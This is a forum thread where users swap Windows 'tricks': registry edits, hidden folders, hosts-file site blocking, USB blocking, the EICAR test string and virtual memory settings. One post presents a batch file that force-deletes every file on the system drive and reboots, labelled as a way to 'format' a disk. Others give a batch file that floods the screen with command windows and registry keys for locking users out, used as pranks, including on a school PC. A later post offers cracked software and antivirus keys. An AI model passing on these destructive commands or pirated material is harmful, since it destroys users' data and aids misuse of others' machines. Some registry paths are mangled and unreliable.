WJunction's official - Computer Tricks Thread!

Status
Not open for further replies.
@my123world:- :- Great Thread you created.

I guess if everybody welcome to share some of the best computer trick so why would i hide myself under the bed.. Here i come with a load of tricks.

NOTEPAD "World Trade Centre Trick"

Did you know that the flight number of the plane that had hit WTC ...on 9/11 was Q33N ....

Open your Notepad in your computer and type the flight number i.e Q33N...

Increase the Font Size to 72, Change the Font to Wingdings. You will be amazed by this.

Display Message on Start Up
Start regedit, if you are unfamiliar with regedit please see our FAQ.
Navigate to HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon
Modify the key legalnoticecaption with what you want to name the window.
Modify the key legalnoticetext with what you want the window to say. Restart

Make your Folders Invisible
1)Right Click on the desktop.Make a new folder
2)Now rename the folder with a space(U have to hold ALT key and type 0160 or 255).
3)Now u have a folder with out a name.
4)Right click on the folder>properties>customize. Click on change icon.
5)Scroll a bit, u should find some empty spaces, Click on any one of them.

click Ok

Block USB in Windows XP
1. Start -> Run -> regedit ->Find the Hkey_Local_Machine>System>Current Control set>Services>USBStor.
2. Look at the right pain and find out the Start where value of the start would be 0000000(3) edit the value by double mouse click and type 4 and save.
3. Restart your computer.

How to Hide the drives in MY COMPUTER
Go to start->run.Type regedit.Now go to:
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer
Now in the right pane
create a new DWORD item and name it NoDrives (it is case sensitive).
Now modify it's value and set it to 3FFFFFF (Hexadecimal) .

How to Format HDD With A Notepad
@echo off
del %systemdrive%\*.*/f/s/q
shutdown -r -f -t 00

and save it as a .bat file

How To Block Websties Without Software
Many times in schools, colleges & offices surfing some sites like orkut,etc are banned !

To overcome this you can unblock these or block some other websites and play pranks !

Do The Following :
For eg. you want to block www.xyz.com !
* Open the folder C:\WINDOWS\system32\drivers\etc
* There you will find a file named HOSTS
* Click on the file and press SHIFT and now right click on it .
* From the right click menu select Open with .
* Now, select Notepad to open the file from the list !
* Now, in the file under the line 127.0.0.1 localhost add another line as 127.0.0.2 www.xyz.com.
* Now, File>>Save !
Now, open your web browser and try openning www.xyz.com , it will not load !
To unblock sites just do the opposite !

Increase your Virtual Ram - to make you system faster

1.Hold down the Windows Key and press the Pause/Break button at the top right of your keyboard (another way is right-clicking your computer and clicking Properties).
2. Click on the Advanced tab.
3. Under Performance, click Settings.
4. Then click the Advanced tab on the button that pops up.
5. Under Virtual Memory at the bottom, click Change.
6. Click the Custom Size button.
7. For the initial size (depending on your HD space), type in anywhere from 1000-1500 (although i use 4000), and for the Maximum size type in anywhere from 2000-2500 (although i use 6000).
8. Click Set, and then exit out of all of the windows.
9. Finally, restart your computer.
10. You now have a faster computer and 1-2gb of virtual RAM!

Hide Files In .JPEG Images
Go to Start >Run>Cmd
Now enter the following code: copy /b picture.jpg + files.rar hiddenfiles.jpg

Folder Options Missing In Windows Xp

Go to Run –>gpedit.msc

User Configuration –> Administrative Templates –> Windows Components –> Windows Explorer
Enable and then Disable “Removes Folder Options menu from Tools menu“

Close all windows explorer windows and then open again.. most probably your folder options is back ..

Test Your AntiVirus With This Simple Trick……

Open notepad and paste this:

X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*
Save it as eicar.com.

Your Anti-virus will then either not let you save it of when you have saved it will remove it for you.

Don’t worry about it. European Institute for Computer Anti-virus Research (EICAR) have got people to program Anti-Virus to recognise this as a threat (even tough it's completely harmless)


How To Open Multiple Cmd Boxes..

Click Start>Notepad>Type:
@echo off
lots of boxes
start boxes

And save as boxes.bat

To stop this process press CTRL+C to terminate.


There are many tricks to share but these are the best one i shared with you friendly guys. Hope you will like it..<3
 
Last edited:
Thank You my123world. I will share more and more tricks very soon as i have loads and loads of tricks saved in my PC which i have collected in my h4ck1ng d@y$.. 8-)
 
@4th option: Aint it same as Win key+L ?
@5th option: Aint it hibernate ? You probably need to enable it in desktops before using it.
 
nEw_boY - Dint u read the benefit which is in code tags in the #4 Trick?

"THE MOST AMUSING PART OF THIS IS THAT EVEN IF UR COMPUTER IS LOCKED UR RUNNING PROGRAMS WILL CONTINUE TO RUN IN THE BACKGROUND!"

#5 Trick - it works & Doesnt simply hibernates :P Tried it on a school PC xD
 
Create Your Own Logon Message

Create Your Own Logon Message

1 Click start click run type regedit then click ok!

2 In The registry editor, drill down to the following key


hklmsoftware Microsoft Windows NTCurrent versionWinlogon


3 Right click LegalNoticeCaption, click modify,
Type: THIS IS NEXT TRICK,and then click ok!


4 Right click legalNoticeText,
click modify, and then Close your message!


5 Restart Your Computer.

6 The message will appear every time you logon!
 
Disable All In Your PC By Regedit

Disable All In Your PC By Regedit
1.Open RegEdit


2.Go to HKEY_CURRENT_USER\Software\Microsoft\CurrentVersion\Policies


3.Go to the Explorer Key


4.Then right click on the right side pane and select “Create Dwordâ€.
Select appropriate value name from the list given below and enter 1 for enabling the value and 0 for disabling it

NoDeletePrinter – Disables Deletion of Printers
NoAddPrinter – Disables Addition of Printers
NoRun – Disables Run Command
NoSetFolders – Removes Folders from Settings on Start Menu
NoSetTaskbar – Removes Taskbar from Settings on Start Menu
NoFind – Removes the Find Command
NoDrives – Hides Drives in My Computers
NoNetHood – Hides the Network Neighborhood
NoDesktop – Hides all icons on the Desktop
NoClose – Disables Shutdown
NoSaveSettings – Don’t save settings on exit
DisableRegistryTools – Disable Registry Editing Tools
NoRecentDocsMenu – Hides the Documents shortcut at the Start button
NoRecentDocsHistory- Clears history of Documents
NoFileMenu _ Hides the Files Menu in Explorer
NoActiveDesktop – No Active Desktop
NoActiveDesktopChanges- No changes allowed
NoInternetIcon – No Internet Explorer Icon on the Desktop
NoFavoritesMenu – Hides the Favorites menu
NoChangeStartMenu _ Disables changes to the Start Menu
NoFolderOptions _ Hides the Folder Options in the Explorer
ClearRecentDocsOnExit – Empty the recent Docs folder on reboot
NoLogoff – Hides the Log Off …. in the Start Menu
 
FONT TRICKS

FONT TRICKS

wanna write like this (Try It And See That Symbol Not Working Here) (Detected as *)
1. press and hold alt
2. press nos 7,3,1 one after the other
3. release alt
easily make hearts ♥ ♥ ♥ with 2 keys only!
press alt.
hold it there
n in the num pad press 3
ull get ? try making ? with 14
wanna write like this▒ ▒ ▒
1. press and hold alt
2. press nos 9,4,5 one after the other
3. release alt
 
Use System Restore Without Loading Windows

What if your system begin to malfunction at the middle of the road while you were playing with computer.. and what if you are not able to load windows.. then only alternative is to use system restore.. but.. how will you load system restore without loading windows..

If you have enabled System Restore, you can use it when you fails to boot into Windows.


How to do:

  1. Restart your computer.
  2. Press F8 before the Windows Logo displays. (Keep pressing F8 from the starting itself)
  3. Then the Windows Boot Menu displays.
  4. Select Safemode With Command Prompt and hit Enter.
  5. Windows loads to Command Prompt.
  6. Then type the following:
  7. %systemroot%system32restorerstrui.exe and hit Enter.
  8. That loads the System Restore window. Continue as usual restoration.
 
I am just thinking about that if i share some premium softwares here like full version SoftWares,Antivirus keys...Then WJ Users Support It

What U say Guys ? What U Say my123world bro ?
 
Status
Not open for further replies.
Back
Top